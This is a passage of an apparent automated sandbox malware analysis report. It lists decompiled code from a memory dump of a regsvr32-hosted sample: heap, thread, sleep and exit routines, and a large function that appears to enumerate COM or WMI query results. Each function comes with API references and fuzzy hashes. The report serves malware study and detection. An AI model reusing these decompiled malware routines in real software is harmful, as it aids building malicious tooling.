				_t12 =  *0x5baf820; // 0x5d5faa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E05B9C862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x5baf818; // 0x5d5f8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                        0x05b9c87d
                                                                                                                                                                        0x05b9c885
                                                                                                                                                                        0x05b9c88d
                                                                                                                                                                        0x05b9c892
                                                                                                                                                                        0x05b9c89a
                                                                                                                                                                        0x05b9c89f
                                                                                                                                                                        0x05b9c8a3
                                                                                                                                                                        0x05b9c8c1
                                                                                                                                                                        0x05b9c8c4
                                                                                                                                                                        0x05b9c8a5
                                                                                                                                                                        0x05b9c8a8
                                                                                                                                                                        0x05b9c8aa
                                                                                                                                                                        0x05b9c8b2
                                                                                                                                                                        0x05b9c8b2
                                                                                                                                                                        0x05b9c8b5
                                                                                                                                                                        0x05b9c8b5
                                                                                                                                                                        0x05b9c8c8
                                                                                                                                                                        0x05b9c895
                                                                                                                                                                        0x05b9c895
                                                                                                                                                                        0x05b9c895

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 01f6817ba1b8c05ac2ecb4e0c9a21f6afe2983fd7e4a3b6cf2716b1436361e9b
                                                                                                                                                                        • Instruction ID: bffb27da10ab67b7abfd5975352885bb702d0f96f53c80ae74c4af56fee73c8f
                                                                                                                                                                        • Opcode Fuzzy Hash: 01f6817ba1b8c05ac2ecb4e0c9a21f6afe2983fd7e4a3b6cf2716b1436361e9b
                                                                                                                                                                        • Instruction Fuzzy Hash: 45F01732A10104EBDF14DBA4D986EFD7BF9FB08645F0141E5E501E7151DB30EE009B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B9632E() {
				intOrPtr _t3;

				_t3 =  *0x5baf818; // 0x5d5f8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x5baf83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                        0x05b9632e
                                                                                                                                                                        0x05b9633b
                                                                                                                                                                        0x05b96345

                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05B96345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: 79dfa205ef412dd209c314f5305e547f8e7039fa5239bc7df66caf688aeed634
                                                                                                                                                                        • Instruction ID: 3991d03a69f8a1d7ee952bd15647e19a71af0a762403b9607ef2be420c0017d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 79dfa205ef412dd209c314f5305e547f8e7039fa5239bc7df66caf688aeed634
                                                                                                                                                                        • Instruction Fuzzy Hash: 07C00279224010DFC7409B64E84BFB47BE0EB09322F1187A1F529DB1E5CF20A4819B44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B98BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B98BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x5baf900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                        0x05b98bec
                                                                                                                                                                        0x05b98bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: daf975604e1c808c338b477f1eb976acdc928934e8c6dde97dd20e77e37336eb
                                                                                                                                                                        • Instruction ID: 2a64859f90c7e9b2590108be5e3b9b29854c1c08403cb75e1a2861629159cf8f
                                                                                                                                                                        • Opcode Fuzzy Hash: daf975604e1c808c338b477f1eb976acdc928934e8c6dde97dd20e77e37336eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 6FB092350A020CBBCB111A91EC07A983F29F704691F004010F60D06060DF62B420AB80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9DA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E05B9DA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                        0x05b9da5f
                                                                                                                                                                        0x05b9da67
                                                                                                                                                                        0x05b9da6c

                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,05B9D8C2,?,?,00000001), ref: 05B9DA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: c3d60b9d3c5a18ffc839739aa86638805d87d55099bd44b630e7b96b549d9f97
                                                                                                                                                                        • Instruction ID: 33b87a5cb5967255df3979ad1aa328055f4ed920e4d5afc4b13d74ac0950892c
                                                                                                                                                                        • Opcode Fuzzy Hash: c3d60b9d3c5a18ffc839739aa86638805d87d55099bd44b630e7b96b549d9f97
                                                                                                                                                                        • Instruction Fuzzy Hash: 67B092362A00019BCB004B74E80B9E07BE0FB56606798C2F0B005C6061C72AD4868A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B98BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E05B98BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x5baf900 = _t1;
				return _t1;
			}




                                                                                                                                                                        0x05b98bd2
                                                                                                                                                                        0x05b98bd8
                                                                                                                                                                        0x05b98bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,05B96502), ref: 05B98BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: 4160c0db15c7c93c1c8f06a5a5d590b3dd858ddb7ab87db21daef920b0e64c87
                                                                                                                                                                        • Instruction ID: 07f934c21631dc35fecc01074202cd7678e0bfb21ec34dbbd3a6e2cb7411ca00
                                                                                                                                                                        • Opcode Fuzzy Hash: 4160c0db15c7c93c1c8f06a5a5d590b3dd858ddb7ab87db21daef920b0e64c87
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B0127439130076D6200B105C07B413D106380B42F104000B6069E1C0EFA03000A504
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05B9DA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E05B9DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E05B9A0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                        0x05b9da70
                                                                                                                                                                        0x05b9da71
                                                                                                                                                                        0x05b9da74
                                                                                                                                                                        0x05b9da77
                                                                                                                                                                        0x05b9da7c
                                                                                                                                                                        0x05b9da7f
                                                                                                                                                                        0x05b9da82
                                                                                                                                                                        0x05b9da82
                                                                                                                                                                        0x05b9da8a
                                                                                                                                                                        0x05b9da8f
                                                                                                                                                                        0x05b9da92
                                                                                                                                                                        0x05b9da95
                                                                                                                                                                        0x05b9da98
                                                                                                                                                                        0x05b9da9b
                                                                                                                                                                        0x05b9daae
                                                                                                                                                                        0x05b9daaf
                                                                                                                                                                        0x05b9dab2
                                                                                                                                                                        0x05b9dab8
                                                                                                                                                                        0x05b9dabb
                                                                                                                                                                        0x05b9dabe
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9dac0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9dabe
                                                                                                                                                                        0x05b9dac4
                                                                                                                                                                        0x05b9dac4
                                                                                                                                                                        0x05b9dac6
                                                                                                                                                                        0x05b9dac6
                                                                                                                                                                        0x05b9dac9
                                                                                                                                                                        0x05b9dac9
                                                                                                                                                                        0x05b9dace
                                                                                                                                                                        0x05b9dad6
                                                                                                                                                                        0x05b9dae2

                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 05B9DAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 81c15f67adc072faa9e48aeab241ebdd516eb649bf95eca5b282a40d214fa382
                                                                                                                                                                        • Instruction ID: f05f2d0a2c82f6f0d4998f10f74e23456179ccbf50211fbb69bae5c3ec0412e7
                                                                                                                                                                        • Opcode Fuzzy Hash: 81c15f67adc072faa9e48aeab241ebdd516eb649bf95eca5b282a40d214fa382
                                                                                                                                                                        • Instruction Fuzzy Hash: B0111E71604205AFDB14CF6AC585AA9B7E8FB44224F1884B9E95697310D770F950CB41
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 05B9EA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E05B9EA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E05B9E400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E05B98BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E05B98BF4( &_v60, 0xfffffffe);
					E05B9E4B4( &_v104);
					return _t320;
				}
				_t165 = E05B99DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E05B99DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E05B99A5A(_t165);
				_v60 = _t322;
				E05B98BAF( &_v52);
				E05B98BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E05B99DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E05B98BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E05B98BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E05B998BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E05B998BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E05B98C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E05B98BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E05B98BF4(_t136, 0);
								E05B98BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E05B998BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E05B99DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E05B99DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05B98BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E05B98BAF( &_v92);
											E05B98BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E05B99E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E05B98BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E05B99DF2(_t283, 0xe0a);
										E05B99E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E05B98BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E05B998BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E05B9E92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E05B98BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                        0x05b9ea53
                                                                                                                                                                        0x05b9ea59
                                                                                                                                                                        0x05b9ea60
                                                                                                                                                                        0x05b9ea63
                                                                                                                                                                        0x05b9ea66
                                                                                                                                                                        0x05b9ea6b
                                                                                                                                                                        0x05b9ea6d
                                                                                                                                                                        0x05b9ea72
                                                                                                                                                                        0x05b9eeba
                                                                                                                                                                        0x05b9eeba
                                                                                                                                                                        0x05b9ea7f
                                                                                                                                                                        0x05b9ea81
                                                                                                                                                                        0x05b9ea84
                                                                                                                                                                        0x05b9ea87
                                                                                                                                                                        0x05b9ee9f
                                                                                                                                                                        0x05b9eea5
                                                                                                                                                                        0x05b9eeaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eeb4
                                                                                                                                                                        0x05b9ea92
                                                                                                                                                                        0x05b9ea99
                                                                                                                                                                        0x05b9eaa0
                                                                                                                                                                        0x05b9eaa3
                                                                                                                                                                        0x05b9eaa8
                                                                                                                                                                        0x05b9eaaa
                                                                                                                                                                        0x05b9eaad
                                                                                                                                                                        0x05b9eab0
                                                                                                                                                                        0x05b9eab1
                                                                                                                                                                        0x05b9eaba
                                                                                                                                                                        0x05b9eac0
                                                                                                                                                                        0x05b9eac3
                                                                                                                                                                        0x05b9eacc
                                                                                                                                                                        0x05b9ead1
                                                                                                                                                                        0x05b9ead6
                                                                                                                                                                        0x05b9eaed
                                                                                                                                                                        0x05b9eafa
                                                                                                                                                                        0x05b9eafd
                                                                                                                                                                        0x05b9eb04
                                                                                                                                                                        0x05b9eb09
                                                                                                                                                                        0x05b9eb10
                                                                                                                                                                        0x05b9eb15
                                                                                                                                                                        0x05b9eb1c
                                                                                                                                                                        0x05b9eb1e
                                                                                                                                                                        0x05b9eb2a
                                                                                                                                                                        0x05b9eb2d
                                                                                                                                                                        0x05b9eb2f
                                                                                                                                                                        0x05b9ee8f
                                                                                                                                                                        0x05b9ee90
                                                                                                                                                                        0x05b9ee99
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee99
                                                                                                                                                                        0x05b9eb35
                                                                                                                                                                        0x05b9eb38
                                                                                                                                                                        0x05b9eb3b
                                                                                                                                                                        0x05b9eb3e
                                                                                                                                                                        0x05b9eb40
                                                                                                                                                                        0x05b9ee5b
                                                                                                                                                                        0x05b9ee5e
                                                                                                                                                                        0x05b9ee61
                                                                                                                                                                        0x05b9ee63
                                                                                                                                                                        0x05b9ee85
                                                                                                                                                                        0x05b9ee8a
                                                                                                                                                                        0x05b9ee65
                                                                                                                                                                        0x05b9ee68
                                                                                                                                                                        0x05b9ee73
                                                                                                                                                                        0x05b9ee7a
                                                                                                                                                                        0x05b9ee7a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eb46
                                                                                                                                                                        0x05b9eb46
                                                                                                                                                                        0x05b9eb58
                                                                                                                                                                        0x05b9eb5b
                                                                                                                                                                        0x05b9eb5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eb65
                                                                                                                                                                        0x05b9eb68
                                                                                                                                                                        0x05b9eb6b
                                                                                                                                                                        0x05b9eb6e
                                                                                                                                                                        0x05b9eb71
                                                                                                                                                                        0x05b9eb74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eb7a
                                                                                                                                                                        0x05b9eb88
                                                                                                                                                                        0x05b9eb8b
                                                                                                                                                                        0x05b9eb8d
                                                                                                                                                                        0x05b9eba6
                                                                                                                                                                        0x05b9ebb5
                                                                                                                                                                        0x05b9ebbd
                                                                                                                                                                        0x05b9ebbd
                                                                                                                                                                        0x05b9ebc0
                                                                                                                                                                        0x05b9ebc7
                                                                                                                                                                        0x05b9ebcb
                                                                                                                                                                        0x05b9ebd1
                                                                                                                                                                        0x05b9ebd3
                                                                                                                                                                        0x05b9ee43
                                                                                                                                                                        0x05b9ee49
                                                                                                                                                                        0x05b9ee4f
                                                                                                                                                                        0x05b9ee52
                                                                                                                                                                        0x05b9ee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee52
                                                                                                                                                                        0x05b9ebe2
                                                                                                                                                                        0x05b9ebf6
                                                                                                                                                                        0x05b9ebfa
                                                                                                                                                                        0x05b9ebfc
                                                                                                                                                                        0x05b9ec01
                                                                                                                                                                        0x05b9ee10
                                                                                                                                                                        0x05b9ee16
                                                                                                                                                                        0x05b9ee21
                                                                                                                                                                        0x05b9ee2c
                                                                                                                                                                        0x05b9ee32
                                                                                                                                                                        0x05b9ee38
                                                                                                                                                                        0x05b9ee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ee3b
                                                                                                                                                                        0x05b9ec07
                                                                                                                                                                        0x05b9edde
                                                                                                                                                                        0x05b9edde
                                                                                                                                                                        0x05b9ede1
                                                                                                                                                                        0x05b9ede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec0f
                                                                                                                                                                        0x05b9ec17
                                                                                                                                                                        0x05b9ec1e
                                                                                                                                                                        0x05b9ec24
                                                                                                                                                                        0x05b9ec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9ec2f
                                                                                                                                                                        0x05b9ec44
                                                                                                                                                                        0x05b9ec4a
                                                                                                                                                                        0x05b9ec53
                                                                                                                                                                        0x05b9ec56
                                                                                                                                                                        0x05b9ec59
                                                                                                                                                                        0x05b9ec5b
                                                                                                                                                                        0x05b9edd1
                                                                                                                                                                        0x05b9edd4
                                                                                                                                                                        0x05b9eddd
                                                                                                                                                                        0x05b9eddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9eddd
                                                                                                                                                                        0x05b9ec6b
                                                                                                                                                                        0x05b9ec6e
                                                                                                                                                                        0x05b9ec75
                                                                                                                                                                        0x05b9ec7b
                                                                                                                                                                        0x05b9ec7e
                                                                                                                                                                        0x05b9ec81
                                                                                                                                                                        0x05b9ec84
                                                                                                                                                                        0x05b9ec87
                                                                                                                                                                        0x05b9ecc3
                                                                                                                                                                        0x05b9ecc3
                                                                                                                                                                        0x05b9ecc6
                                                                                                                                                                        0x05b9ed72
                                                                                                                                                                        0x05b9ed86
                                                                                                                                                                        0x05b9ed96
                                                                                                                                                                        0x05b9ed9a
                                                                                                                                                                        0x05b9ed9c
                                                                                                                                                                        0x05b9edb3
                                                                                                                                                                        0x05b9edb7
                                                                                                                                                                        0x05b9edc0
                                                                                                                                                                        0x05b9edcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9edcb
                                                                                                                                                                        0x05b9eda2
                                                                                                                                                                        0x05b9eda3
                                                                                                                                                                        0x05b9eda8
                                                                                                                                                                        0x05b9eda8
                                                                                                                                                                        0x05b9edaa
                                                                                                                                                                        0x05b9edab
                                                                                                                                                                        0x05b9edb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9edb0
                                                                                                                                                                        0x05b9eccc
                                                                                                                                                                        0x05b9eccc
                                                                                                                                                                        0x05b9eccf
                                                                                                                                                                        0x05b9ed3a
                                                                                                                                                                        0x05b9ed4e
                                                                                                                                                                        0x05b9ed5e
                                                                                                                                                                        0x05b9ed62
